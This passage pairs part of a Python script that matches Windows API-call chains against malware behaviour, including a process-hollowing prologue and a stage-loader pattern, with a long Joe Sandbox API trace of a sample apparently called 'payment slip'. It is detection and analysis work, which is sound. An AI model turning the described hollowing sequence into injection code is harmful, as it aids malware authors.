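    # Opening moves of process hollowing: spawn a child, fetch its thread context,
    # read 4 bytes from it (PEB.ImageBaseAddress, reached through ctx.Ebx + 8).
    "process_hollowing_prologue": ("CreateProcess", "GetThreadContext", "ReadProcessMemory"),
    # Open a file read-only and pull it into fresh memory: a stage loader.
    "file_to_memory": ("CreateFile", "VirtualAlloc", "ReadFile"),
}


def normalise(api):
    return re.sub(r"(?<=[a-z])[AW]$", "", re.sub(r"^Wow64", "", api))


def match_chains(calls):
    """Chains whose APIs occur in order among the function's own (non-subcall)
    calls, taken in call-site address order."""
    own = sorted((c for c in calls if not c.subcall), key=lambda c: c.ref)
    seq = [normalise(c.api) for c in own]
    hits = []
    for name, chain in CHAINS.items():
        it = iter(seq)  # consumed left to right: an ordered-subsequence test
        if all(any(api == want for api in it) for want in chain):
            hits.append(name)
    return hits


# Rows copied from two tables on this page (both in the unbacked region at 0x03B00000).
LOADER_ROWS = """\
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03B026C1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03B028E7
"""
HOLLOW_ROWS = """\
• CreateProcessW.KERNELBASE(?,00000000), ref: 03B01ACD
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03B01AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03B01B13
"""
```

Paste any APIs table from the report into a string and run `match_chains(parse_api_rows(text))` and `decode_call` per row; rows whose relevant words are `?` or string literals decode to `{}` rather than misreporting. On the two tables embedded above, the 03B01ACD table triggers `process_hollowing_prologue` and the 03B026C1 table triggers nothing, because that table lists only CreateFileW and VirtualFree; the VirtualAlloc and ReadFile calls of that function are visible only in its control-flow graph, so a rule fed from the APIs tables alone misses them.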
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000733A2
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00033A04
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_wcslen
                                        • String ID: Line:
                                        • API String ID: 2289894680-1585850449
                                        • Opcode ID: a7dae8cd78000b19e064dcb2c3137efdd0350ed7e3bca1e2e1bc03814cbb06bd
                                        • Instruction ID: 9ef8acbd347189736d6710782c6bfb898bf6c7fb6d57c21a4cd4c96068b0faf3
                                        • Opcode Fuzzy Hash: a7dae8cd78000b19e064dcb2c3137efdd0350ed7e3bca1e2e1bc03814cbb06bd
                                        • Instruction Fuzzy Hash: 0531C271408304AAD326EB20DC85BEFB7DCAB45720F00892EF5D996092DBB49788C7D2
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                          • Part of subcall function 000532A4: RaiseException.KERNEL32(?,?,?,0005068A,?,00101444,?,?,?,?,?,?,0005068A,00031129,000F8738,00031129), ref: 00053304
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                        • Instruction ID: 490397f070c6710fc93f0b5b62357c669dbb14332d447795f247fca2d340b7df
                                        • Opcode Fuzzy Hash: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                        • Instruction Fuzzy Hash: A9F0C23490070EB7CB00BAA4D84ADEF77AD5F00351B604531BD14DA992EF71EA6DC695
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 000A302F
                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000A3044
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
                                        • Instruction ID: bd32a276fbfac23f5fb68cde1c9268479b263714edd4c0c7418d7144954ac114
                                        • Opcode Fuzzy Hash: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
                                        • Instruction Fuzzy Hash: 66D05E7250032867EA20E7A4EC0EFDB3A6CDB04750F0002A1B759E6091DAB49984CAD0
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 000B82F5
                                        • TerminateProcess.KERNEL32(00000000), ref: 000B82FC
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 000B84DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFreeLibraryTerminate
                                        • String ID:
                                        • API String ID: 146820519-0
                                        • Opcode ID: c87b7a24d34beaec7f41aa68025ed28e58644fb88c0d484b558e1a7676e1aac3
                                        • Instruction ID: 7251716b715d9ac36e0e1feaee466f7da4e5e2c1d3c22304b37f8680f36e3c59
                                        • Opcode Fuzzy Hash: c87b7a24d34beaec7f41aa68025ed28e58644fb88c0d484b558e1a7676e1aac3
                                        • Instruction Fuzzy Hash: A5127B719083019FD764DF28C484BAABBE9FF85314F04895DE8899B262DB31ED45CF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed6764181b37f8330b651c646b47d149a4525680f60e09bdc629b2d338c057cc
                                        • Instruction ID: 8f43258db42514bc8276c811009b5805e8854e20bcb0e1f7df57f1fe38e4e142
                                        • Opcode Fuzzy Hash: ed6764181b37f8330b651c646b47d149a4525680f60e09bdc629b2d338c057cc
                                        • Instruction Fuzzy Hash: B951A171D0060AAFDB219FA8CC45FFE7BBAEF05322F140059F805A7292D7759A41DB61
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,000685CC,?,000F8CC8,0000000C), ref: 00068704
                                        • GetLastError.KERNEL32(?,000685CC,?,000F8CC8,0000000C), ref: 0006870E
                                        • __dosmaperr.LIBCMT ref: 00068739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                        • String ID:
                                        • API String ID: 490808831-0
                                        • Opcode ID: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                        • Instruction ID: e77c40e0a1a19a6aa65ad04b2b4db1b3f317515e4f1d2a3038c1e7443bb53d85
                                        • Opcode Fuzzy Hash: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                        • Instruction Fuzzy Hash: 23016B3260427026D2B06334EC45BBE27CB4B81B75F384319F9489B1D3DEA0CD818350
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,000A2CD4,?,?,?,00000004,00000001), ref: 000A2FF2
                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A3006
                                        • CloseHandle.KERNEL32(00000000,?,000A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A300D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: a10514fb29b01f71bcadd819b879a9185663ae24a5ef6679edc9f6a2df36e68a
                                        • Instruction ID: 6f2d739df6fa0fadb8f166f5997aa7b4739e0a5109e35f980801238d74a2d562
                                        • Opcode Fuzzy Hash: a10514fb29b01f71bcadd819b879a9185663ae24a5ef6679edc9f6a2df36e68a
                                        • Instruction Fuzzy Hash: 87E0863268021077F2311756FC0DF8B3A5CD787B71F144214FB1D750D046A4160142A8
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 000417F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: CALL
                                        • API String ID: 1385522511-4196123274
                                        • Opcode ID: 840aeae63458f27bf72d22b99e4ecaa14454d0e7e383d6d3b814267f06dbcd67
                                        • Instruction ID: 131d13fdc4c87afe9fefdfac8545a3c5f6b897048f6797496ca4810a25eefa46
                                        • Opcode Fuzzy Hash: 840aeae63458f27bf72d22b99e4ecaa14454d0e7e383d6d3b814267f06dbcd67
                                        • Instruction Fuzzy Hash: D7228CB0608201DFC764DF14C484BAABBF1BF85314F15892DF4968B3A2D772E985CB46
                                        APIs
                                        • _wcslen.LIBCMT ref: 000A6F6B
                                          • Part of subcall function 00034ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LibraryLoad_wcslen
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 3312870042-2806939583
                                        • Opcode ID: ece208d4d4824ab23b224df376b9994e3a8c64bbdf4a981f796e4fff5d445cf7
                                        • Instruction ID: 868e4bb588b05c3dd03d9d171ff8a072aac3ab83841b5b671c2de064a459d44f
                                        • Opcode Fuzzy Hash: ece208d4d4824ab23b224df376b9994e3a8c64bbdf4a981f796e4fff5d445cf7
                                        • Instruction Fuzzy Hash: 24B1B2311082018FCB15EF60C891DAEB7E9AF95310F44892DF58A97263EF31ED49CB92
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 00072C8C
                                          • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                          • Part of subcall function 00032DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Name$Path$FileFullLongOpen
                                        • String ID: X
                                        • API String ID: 779396738-3081909835
                                        • Opcode ID: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                        • Instruction ID: 05ab4bbd3d5b030ec6946f69fa90b3635db417b9cf5f481a41f8a97cc44a9713
                                        • Opcode Fuzzy Hash: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                        • Instruction Fuzzy Hash: 3521A871E0025C9FDB42EF94C845BEE7BFCAF49714F008059E505B7241DBB85A898FA1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID: EA06
                                        • API String ID: 2638373210-3962188686
                                        • Opcode ID: 8a3b45d2641f885ff14e5a26595bc6a73a3a7f7e900662656626b15dc11d7a11
                                        • Instruction ID: 86594eabe98b445d01c74357e0fdc6a686cb58d96e96fdc3bff9d10eb0bf2ad9
                                        • Opcode Fuzzy Hash: 8a3b45d2641f885ff14e5a26595bc6a73a3a7f7e900662656626b15dc11d7a11
                                        • Instruction Fuzzy Hash: 9D01B572D042587EDF28C7A8C856EFEBBF89B06301F00455AE592D6182E5B4E7088B60
                                        APIs
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_
                                        • String ID:
                                        • API String ID: 1144537725-0
                                        • Opcode ID: 5458a0d71d1c9973d0e936a4a502845f417b6a17f4ea3096227b9fbeb03b4c84
                                        • Instruction ID: b07283d3c423edfc6c6257780c463192faa4991bb9b3b0b77939080407e8d0fc
                                        • Opcode Fuzzy Hash: 5458a0d71d1c9973d0e936a4a502845f417b6a17f4ea3096227b9fbeb03b4c84
                                        • Instruction Fuzzy Hash: 3B319370904301DFE761DF24D884B9BBBE8FB49719F00092EF5DA87641E7B5AA44CB52
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0003BB4E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID:
                                        • API String ID: 1385522511-0
                                        • Opcode ID: 2c2f3716f00f1365efd27b16607665ec7b584c0c4b05b90b9eb7af620ff6c951
                                        • Instruction ID: 1ab05e007a4908f63834a4ab4a4743e44b945f5a79467c853724db3472ae997d
                                        • Opcode Fuzzy Hash: 2c2f3716f00f1365efd27b16607665ec7b584c0c4b05b90b9eb7af620ff6c951
                                        • Instruction Fuzzy Hash: 1932DF30A00209DFDB61DF54C898BBEB7F9FF44318F14805AEA85AB251C7B4AE45CB51
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03B01ACD
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03B01AF1
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03B01B13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                        • Instruction ID: 8020b01372431f12794c138fd61f0e300eef5a5d27876e82cbfbb5d871e59178
                                        • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                        • Instruction Fuzzy Hash: 8612BD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                        APIs
                                          • Part of subcall function 00034E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                          • Part of subcall function 00034E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                          • Part of subcall function 00034E90: FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EFD
                                          • Part of subcall function 00034E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                          • Part of subcall function 00034E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                          • Part of subcall function 00034E59: FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressFreeProc
                                        • String ID:
                                        • API String ID: 2632591731-0
                                        APIs
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        APIs
                                          • Part of subcall function 00064C7D: RtlAllocateHeap.NTDLL(00000008,00031129,00000000,?,00062E29,00000001,00000364,?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?), ref: 00064CBE
                                        • _free.LIBCMT ref: 0006506C
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00031129,00000000,?,00062E29,00000001,00000364,?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?), ref: 00064CBE
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034F6D
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        Similarity
                                        • API ID: LongNamePath_wcslen
                                        • String ID:
                                        • API String ID: 541455249-0
                                        APIs
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        APIs
                                          • Part of subcall function 00033837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                          • Part of subcall function 0003D730: GetInputState.USER32 ref: 0003D807
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                          • Part of subcall function 000330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0003314E
                                        Similarity
                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                        • String ID:
                                        • API String ID: 3667716007-0
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        APIs
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00031CBC
                                        Similarity
                                        • API ID: InfoParametersSystem
                                        • String ID:
                                        • API String ID: 3098949447-0
                                        APIs
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 03B022B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 000C961A
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C965B
                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 000C969F
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C96C9
                                        • SendMessageW.USER32 ref: 000C96F2
                                        • GetKeyState.USER32(00000011), ref: 000C978B
                                        • GetKeyState.USER32(00000009), ref: 000C9798
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C97AE
                                        • GetKeyState.USER32(00000010), ref: 000C97B8
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C97E9
                                        • SendMessageW.USER32 ref: 000C9810
                                        • SendMessageW.USER32(?,00001030,?,000C7E95), ref: 000C9918
                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 000C992E
                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000C9941
